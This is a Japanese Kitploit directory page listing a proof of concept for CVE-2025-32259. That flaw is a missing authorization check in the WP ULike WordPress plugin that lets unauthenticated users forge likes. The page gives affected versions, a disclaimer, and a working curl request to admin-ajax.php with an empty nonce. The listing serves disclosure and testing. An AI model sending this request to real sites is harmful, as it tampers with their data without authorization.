Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
wp-ulike-cve-2025-32259-poc — 影響を受けるWP ULikeプラグインのバージョンでは、特定のAJAXアクションや投票操作を許可する前に、適切な認可チェックが行われません。これにより、未認証ユーザーがログインユーザーのみが実行できるはずの方法でプラグインと対話でき、投票結果を歪めたり、誤解を招くデータを注入したりする可能性があります。 | Kitploit
ツール/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

影響を受けるWP ULikeプラグインのバージョンでは、特定のAJAXアクションや投票操作を許可する前に、適切な認可チェックが行われません。これにより、未認証ユーザーがログインユーザーのみが実行できるはずの方法でプラグインと対話でき、投票結果を歪めたり、誤解を招くデータを注入したりする可能性があります。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
1年前未レビュー

WP ULike ≤ 4.7.9.1 - 未認証コンテンツスプーフィング (CVE-2025-32259)

🔬 WordPress用WP ULikeプラグインのCVE-2025-32259を実証するシンプルなPoCです。
🚨 教育目的のみ – 明示的な許可なしにシステムでテストしないでください。


🧠 概要

WP ULikeは、サイト上のコンテンツにユーザーが「いいね」を付けられる人気のWordPressプラグインです。4.7.9.1までのバージョンは認可欠落の脆弱性の影響を受け、未認証ユーザーがAJAXリクエストを介して「いいね」アクションを偽装できる可能性があります。

  • CVE: CVE-2025-32259
  • 影響を受けるバージョン: ≤ 4.7.9.1
  • 修正済みバージョン: 4.7.9.2

🚀 概念実証

この脆弱性により、未認証ユーザーがAJAXエンドポイントと対話し、権限なしに任意のコンテンツ(投稿、コメントなど)に「いいね」を付けることができます。

🔧 PoCスクリプト

root@kitploit:~
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

id=1 を有効な投稿IDに置き換えてください。

成功時のレスポンスは次のようになります:
{"status":"success","msg":"You liked this."}
ツールをダウンロード